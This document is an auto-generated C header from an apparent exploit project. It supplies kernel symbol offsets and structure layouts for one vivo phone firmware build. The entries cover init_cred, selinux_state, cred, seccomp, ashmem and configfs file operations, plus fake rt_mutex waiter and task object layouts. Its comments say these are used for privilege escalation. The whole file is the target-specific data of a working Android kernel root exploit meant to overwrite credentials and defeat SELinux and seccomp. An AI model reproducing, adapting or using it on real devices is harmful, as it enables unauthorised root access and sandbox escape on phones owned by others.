/* AUTO-GENERATED by offsets_auto.py — 全量偏移提取器
 * 生成时间: 2026-08-11 22:55:26
 * 输入: kallsyms + vmlinux BTF kallsyms.txt + vmlinux.btf
 * 符号偏移来自 kallsyms 实证; 结构偏移来自 BTF (含 RANDSTRUCT 真实布局).
 * 警告: 本文件由工具生成, 请勿手改; 重新生成请运行
 *   python tools/offset_tools/offsets_auto.py header <kallsyms> <btf> -o exploit/src/target_x200.h
 */
#ifndef OFFSET_H
#define OFFSET_H

#define BUILD_VARIANT_LABEL "x200_release"
#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT "vivo/PD2415/PD2415:16/BP2A.250605.031.A3_V000L1/compiler260430161853:user/release-keys"
#endif

#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL /* PAGE_OFFSET: VA_BITS39 direct map low half 256GB */
#define KERNELSNITCH_IDENTITY_END 0xffffff9000000000ULL /* 64GB */
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* ===== 符号偏移 (kallsyms 实证, 相对 KIMAGE_TEXT_BASE) ===== */
#define INIT_TASK_OFF                    0x0210e280ULL  /* init_task */
#define ROOT_TASK_GROUP_OFF              0x02305600ULL  /* root_task_group */
#define SELINUX_ENFORCING_OFF            0x02346ee8ULL  /* selinux_state */
#define SELINUX_BLOB_SIZES_OFF           0x01672688ULL  /* selinux_blob_sizes */
#define SECURITY_HOOK_HEADS_OFF          0x01671f50ULL  /* security_hook_heads */
#define KMALLOC_CACHES_OFF               0x01671a90ULL  /* kmalloc_caches */
#define ANON_PIPE_BUF_OPS_OFF            0x0115ba08ULL  /* anon_pipe_buf_ops */
#define CONFIGFS_READ_ITER_OFF           0x0048c3fcULL  /* configfs_read_iter */
#define CONFIGFS_BIN_WRITE_ITER_OFF      0x0048c928ULL  /* configfs_bin_write_iter */
#define COPY_SPLICE_READ_OFF             0x00410c18ULL  /* copy_splice_read */
#define NOOP_LLSEEK_OFF                  0x003c39b8ULL  /* noop_llseek */
#define ASHMEM_MISC_FOPS_OFF             0x0226b4e8ULL  /* ashmem_misc+0x10 */
#define ASHMEM_FOPS_OFF                  0x012eba58ULL  /* ashmem_fops */
#define ASHMEM_IOCTL_OFF                 0x00c803dcULL  /* ashmem_ioctl */
#define ASHMEM_COMPAT_IOCTL_OFF          0x00c80a98ULL  /* compat_ashmem_ioctl */
#define ASHMEM_MMAP_OFF                  0x00c80aecULL  /* ashmem_mmap */
#define ASHMEM_OPEN_OFF                  0x00c80d0cULL  /* ashmem_open */
#define ASHMEM_RELEASE_OFF               0x00c80d94ULL  /* ashmem_release */
#define ASHMEM_SHOW_FDINFO_OFF           0x00c80e20ULL  /* ashmem_show_fdinfo */

#define INIT_TASK                (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP          (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING        (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SELINUX_BLOB_SIZES       (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS      (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES           (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS        (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define CONFIGFS_READ_ITER       (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER  (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ         (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK              (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define ASHMEM_MISC_FOPS         (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS              (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL             (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL      (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP              (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN              (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE           (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO       (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)

/* ===== slide 路由专用符号 ===== */
#define SLIDE_NFULNL_LOGGER_OFF          0x02102268ULL  /* nfulnl_logger */
#define SLIDE_LOGGERS_0_1_OFF            0x021021b0ULL  /* loggers */
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF    0x02367ee0ULL  /* sysctl_bootid */
#define SLIDE_SYSCTL_BOOTID_OFF          0x02367ee0ULL  /* sysctl_bootid */
#define SLIDE_INIT_CRED_OFF              0x021205c8ULL  /* init_cred */
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF

#define SLIDE_NFULNL_LOGGER_IMAGE    \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE      \
  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE        \
  (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE  \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE    \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* ===== pselect 布局 (derive-pselect 反汇编推导; 未推导时默认 0) ===== */
#define PSELECT_WAITER_WORD_SHIFT 0

/* ===== 结构偏移 (BTF 实证) ===== */
/* rt_mutex_waiter 真实布局 (RANDSTRUCT). 注意: WAITER_* 当前为死代码,
 * 实际提权用 FAKE_WAITER_* (exploit 自建假对象布局, 见下). */
#define WAITER_TREE_ENTRY_OFF        0x0
#define WAITER_PI_TREE_ENTRY_OFF     0x28
#define WAITER_TASK_OFF              0x50
#define WAITER_LOCK_OFF              0x58
#define WAITER_WAKE_STATE_OFF        0x60
#define WAITER_WW_CTX_OFF            0x68
#define WAITER_PRIO_OFF        0x18  /* 派生: tree+0x18 (BTF 无 prio) */
#define WAITER_DEADLINE_OFF    0x20  /* 派生: tree+0x20 (BTF 无 deadline) */

/* 假 waiter 布局 (exploit 内部, 与内核版本无关; 建议与 BTF rt_mutex_waiter 一致) */
#define FAKE_WAITER_TREE_PRIO_OFF         0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF     0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF     0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF      0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF  0x48
#define FAKE_WAITER_TASK_OFF              0x50
#define FAKE_WAITER_LOCK_OFF              0x58
#define FAKE_WAITER_WAKE_STATE_OFF        0x60
#define FAKE_WAITER_WW_CTX_OFF            0x68

/* task_struct / mm_struct / cred / seccomp (BTF) */
#define FAKE_TASK_USAGE_OFF          0x40
#define FAKE_TASK_PRIO_OFF           0x84
#define FAKE_TASK_NORMAL_PRIO_OFF    0x8c
#define FAKE_TASK_TASK_GROUP_OFF     0x348
#define FAKE_TASK_PI_LOCK_OFF        0x90c
#define FAKE_TASK_PI_WAITERS_OFF     0x920
#define FAKE_TASK_PI_TOP_TASK_OFF    0x930
#define FAKE_TASK_PI_BLOCKED_ON_OFF  0x938
#define MM_OWNER_OFF                 0x408
#define TASK_PID_OFF                 0x618
#define TASK_TGID_OFF                0x61c
#define TASK_REAL_PARENT_OFF         0x628
#define TASK_ATOMIC_FLAGS_OFF        0x5d8
#define TASK_REAL_CRED_OFF           0x818
#define TASK_CRED_OFF                0x820
#define TASK_COMM_OFF                0x830
#define TASK_TASKS_OFF               0x550
#define TASK_SECCOMP_OFF             0x8e8
#define TASK_THREAD_INFO_FLAGS_OFF 0x00

#define CRED_UID_OFF             0x8
#define CRED_SECUREBITS_OFF      0x28
#define CRED_CAPS_OFF            0x30
#define CRED_SECURITY_OFF        0x80
#define SELINUX_CRED_OSID_OFF    0x0
#define SELINUX_CRED_SID_OFF     0x4
#define SELINUX_CRED_BLOB_OFF 0

#define SECCOMP_MODE_OFF             0x00
#define SECCOMP_FILTER_COUNT_OFF     0x04
#define SECCOMP_FILTER_OFF           0x08
#define TIF_SECCOMP_BIT           11   /* arch/arm64 thread_info.h 实证 */
#define PFA_NO_NEW_PRIVS_BIT      0    /* sched.h 实证 (vivo 与上游不同) */

/* struct page (BTF size + 稳定联合偏移) */
#define STRUCT_PAGE_SIZE             0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF         0x08
#define STRUCT_PAGE_TYPE_OFF          0x30


/* pipe (BTF size + 稳定常量) */
#define PIPE_BUFFER_SIZE             0x28
#define PIPE_BUFFER_SLOTS            32   /* exploit 策略 (F_SETPIPE_SZ), 非内核布局 */
#define PIPE_BUF_FLAG_CAN_MERGE      0x10


/* file_operations (BTF) */
#define FOPS_OWNER_OFF               0x00
#define FOPS_LLSEEK_OFF              0x08
#define FOPS_READ_OFF                0x10
#define FOPS_WRITE_OFF               0x18
#define FOPS_READ_ITER_OFF           0x20
#define FOPS_WRITE_ITER_OFF          0x28
#define FOPS_IOCTL_OFF               0x48
#define FOPS_COMPAT_IOCTL_OFF        0x50
#define FOPS_MMAP_OFF                0x58
#define FOPS_OPEN_OFF                0x68
#define FOPS_RELEASE_OFF             0x78
#define FOPS_SPLICE_READ_OFF         0xb8
#define FOPS_SHOW_FDINFO_OFF         0xd8

/* configfs_buffer (BTF) → util.c 构造 configfs 伪对象 */
#define CFG_PAGE_OFF                 16
#define CFG_NEEDS_READ_FILL_OFF      80
#define CFG_BIN_BUFFER_OFF           88
#define CFG_BIN_BUFFER_SIZE_OFF      96
#define CFG_CB_MAX_SIZE_OFF          100

/* ===== exploit 假对象内部布局 (与内核版本无关, 勿改) ===== */
#define LOCK_OFF      0x1350
#define W0_OFF        0x2220
#define FOPS_OFF      0x1000
#define SCRATCH_OFF   0x3000
#define RIGHT_OFF     0x4440
#define LEFT_OFF      0x5550
#define FAKE_TASK_OFF 0x3200

#define WAITER_LOCAL_OFF 0x80

#endif
